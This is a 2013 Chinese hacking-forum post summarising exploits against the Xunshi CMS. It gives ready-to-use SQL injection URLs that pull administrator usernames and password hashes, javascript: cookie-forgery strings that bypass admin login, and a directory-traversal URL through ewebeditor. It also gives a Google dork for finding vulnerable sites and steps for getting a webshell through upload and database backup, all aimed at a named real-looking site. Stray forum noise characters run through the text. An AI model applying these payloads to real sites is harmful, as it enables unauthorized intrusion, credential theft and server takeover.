中国网络渗透测试联盟

标题: 讯时漏洞总结 [打印本页]

作者: admin    时间: 2013-1-16 21:25
标题: 讯时漏洞总结
by:血封忆尘' S( V, i- {( `8 Z
% J1 V$ T& R/ ^: J
在网上也有什么讯时三板斧的文章..但我个人觉得有时候靠那三种还是入侵不了(随着版本的更新)7 }4 N+ N! i+ {5 b& k

! {% V. u! e( u9 o以下本文总结来自黑防去年第9期杂志上的内容...
8 x& W8 N( O0 e* a$ L. p4 {4 Q; {2 [, e* r
先说一个注入吧:http://www.political-security.com/news_more.asp?lm=2 %41nd 1=2 union %53elect 1,2,3,0x3b%3 Y) U  W# M1 @
, N# j( \7 r+ A
26user,0x3b%26pass,6,7,8 %46rom %41dmin union %53elect * %46rom lm where 1=2
1 T' H1 F# l( K
! o; \6 M# O5 N$ {0 M记得千万别多了空格,我测试站的时候就发现多了空格注入不出结果的情况
& x$ G8 V2 y: `( }; U. S+ ~9 @这里一个注入: x$ _2 U7 F' o6 i. b" ]7 A/ ^

- V8 Q! {( k/ W' Y: @效果如图:- y1 u( ]! ?/ k7 K
. p' D9 p; x' y# |" O
& v+ l9 \% y6 c: Y% x
! X* f$ _% }: \, X; g3 |
这样就很轻松可以得到管理用户名与密码..这里md5可以拿去破解.但是现在安全意识的提高.
# r/ j5 }1 q! z1 o. P% z" t% V  P  B+ }: p3 t
密码复杂了..很难破出来..那么我们可以通过后来cookies欺骗进去
6 e& a$ q7 ]: a1 ^4 W+ W' i( H! G' z
javascript:alert(document.cookie="adminuser="+escape("用户名"));javascript:alert(document.cookie="adminpass="+escape("md5值")); javascript:alert(document.cookie="admindj="+escape("1"));
  W7 f: `2 \& Q6 d5 f4 ]: ]4 l/ _3 H' x0 O+ k. S3 V# p& `
那么这里就会出现一种情况了..如果后台找不到咋办呢??请看下一漏洞让你更轻松达到你想要的效果:' W8 |* c5 ?) u0 R3 e$ u# h

$ |6 Z4 ?3 o9 n$ V5 b0 l+ k& t因为讯时结合了ewebeditor程序..而它没有在处理的时候忽视了ewebeditor有个可以列目录的漏洞
' @; t* j* \& t$ R2 f9 C5 L% }
: p4 Q6 E3 e# F/ Q0 M: q: s它是做了验证的..但讯时最没做好的地方就是验证..我们可以通过cookies欺骗来绕过验证.从而可以
0 f! U& g  b4 R& [3 K1 ]) |4 N% p3 J" x5 u2 P3 w# D) a
访问这页面来列目录..步骤如下:
/ D+ Z$ D- N3 b( N: D/ K
# q; Z% }0 E2 y- Q. X; K* rjavascript:alert(document.cookie="admindj=1") ! X2 i: b- V' o; G( G( V2 B

" k+ D7 H5 C, I3 L* e3 Fhttp://www.political-security.co ... asp?id=46&dir=../..+ m. Y8 U2 D: _3 ?
6 p( V+ s0 \1 Y1 }3 U
效果如图:8 N0 q4 ]; J3 a; V5 m( n+ G- d
9 }2 m, M$ Y/ r% F. c( C- n  s# [) {

. k3 y" ^  H. T0 [& y3 z" P2 L5 g$ I' J- ~6 F5 U0 f* m1 i  w3 a
这样全站目录都能瞧了..找到后台目录..进去..
# e6 Q+ d  s1 |7 M9 ?3 F" x3 j, f* o# G
那么进了后台怎么拿shell??上传--备份就ok了..
: R- [. ]9 ?: G# |3 O, z* X8 `4 p0 H- P0 ]8 \/ q7 Z
那么有时候有些管理在做后台功能的时候把备份页面去掉了...而他本机里备份页面还是存在的..
6 t& U' F$ T# i& M! G$ T' M  ~' V9 j
这个我也碰到过一次..你都可以通过列目录来实现..; d7 q! I# S+ i4 Z  ^: @
4 c# Z; C+ S8 V  {/ U9 \
javascript:alert(document.cookie="admindj=1") 9 S2 m: P# |6 a, ]& M( l  u
% D, x  M7 C7 |5 p4 p) L4 \
http://www.political-security.co ... p?action=BackupData
5 n; L( T: p# }+ F& L* @9 ^; ?! d- w7 j4 g# [3 b
备份ok..
: p% f  f% i" z- L+ x& |& X1 I
4 K. W( r. D& I1 W0 T& |- l那么以上两个漏洞都被管理封住了...咋办??上面两个是比较常见的..那么下面一个注入漏洞呢?( G4 K: w5 F* `" u% P+ r

2 K7 g9 x4 |2 _6 h在admin目录下有个admin_lm_edit.asp页面..里面的id没有过滤 那么我们就可以先cookies下
' n8 o" ]# E& w  Z7 Z, @, L) R8 B" a
然后访问此页面进行注入..步骤如下:
6 I: f: f2 [9 u1 l4 B1 k
* M/ g6 y5 n1 w9 z( [- hjavascript:alert(document.cookie="adminuser=admin");alert(document.cookie="admindj=1")
; F! a; q& a; Z: Q, ]2 ^, k4 U) h2 G  s$ k/ z# u: L4 Q4 Q: C
然后请求admin/admin_chk.asp页面
8 C1 g3 n* H3 H1 U, K- J6 d2 A7 @: Y4 [: n9 y7 ^
输入注入语句admin/admin_lm_edit.asp?id=1 %41nd 1=2 union %53elect 1,2,3,4,id%260x3b%# g3 M% f1 N8 c- M+ n
" y. P9 F9 }6 J" K: w8 O
26user%260x3b%26pass,6,7,8%20%46rom%20%41dmin7 s* \1 O( u* X6 B" U

0 D+ p% F: e2 L. z4 G9 G( w效果如图所示:  `$ g" F8 Z0 c5 G

! y8 _2 L, d/ a/ v9 d
) \; |# @* j! W0 t2 ~4 E$ L
* E# g6 ]7 C3 B6 t$ O* H讯时漏洞2
/ g0 A% D8 d6 b' Tgoogle关键字:inurl:news_more.asp?lm2= (关键字很多的自己定义吧)% }* Z+ w# f% }7 m0 Z7 d/ c& z

. ?! c/ Y* _/ @+ [7 ^* ^1、/admin/admin_news_pl_view.asp?id=1- u* Z- p/ V, `/ V. L. N. g( e9 ^* M/ g- W
//id任意 填入以下语句+ l5 \; x- [  e

7 Q, c" X7 G$ F2、有时1显示错误信息的时候继续往后退2,3,4,我退到11才找到了页面,郁闷!
6 |# J) W( f$ F2 M& G' V) {7 c
' e( ]7 Q! x/ q5 l3 K1 D# I$ ]) G4 B

+ b6 r6 [7 X: Z- I3 k* R0 r( P3、|'+dfirst("[user]","[admin]")+chr(124)+dfirst("[pass]","[admin]"),username='
3 q0 z0 A( H8 Y. o 0 J2 C) \8 ?: }; ?
$ P- x1 |0 R5 p; j! S. f& a

( ^+ L4 F% B6 h4 t  Y% h- `爆出管理员帐号和密码了) t! V7 C% W0 x! @
& w9 r; \! B6 e3 A- ?) r' `

7 U; S8 w- ]. {
; [5 F- @: v8 P1 z( ~4、cookies进后台+ `- \# `- e: \1 M7 l

9 q2 N  s, d& X  l3 X) ]7 Ijavascript:alert(document.cookie="adminuser=" + escape("admin"));alert(document.cookie="adminpass=" + escape("480d6d6b4d57cc903f3bab877248da40"));, _* ?2 \9 j' V0 Z! `' H5 t3 |

% w2 ?, D% q- [$ R) N$ q# w1 h- I! L7 [& H
( x, C9 r! {% X% h( [
5、后台用了cookie验证,直接访问http://www.political-security.com/admin/admin_index.asp就OK了!: Y% Z; a' n6 O: f( o0 T
9 d  i2 I, K/ U" T! G8 k  f/ U

4 O5 }5 J9 U# L3 r
5 b9 i0 N+ L: D- z. H5 Y6、后台有上传和备份取SHELL不难。
0 i" o: r9 d4 w) [' o; I8 f
% e- U! }9 M) A7、讯时还有个列目录漏洞:http://www.political-security.co ... asp?id=46&dir=../..
. D9 Q$ D0 i, z! C8 s
, c5 x% e/ H; \7 }! e* B逍遥复仇:我搞了一个讯时cms4.1版本的没有数据库备份不知道怎么搞SHELL,有的说虽然后台显示但备份页面是存在的,登录后台后访问 http://www.political-security.com/admin/admin_db_backup.asp?action=BackupData,我这个没有,郁闷着呢,谁还有其他办法提供一下,谢谢!5 [; z+ {! {* y  S; l; A
/ U9 a- M* {+ J; R2 ~

7 Y/ W- t& g: t' t4 \8 Q8 v, d, s: K% a, J1 J1 t8 d





欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2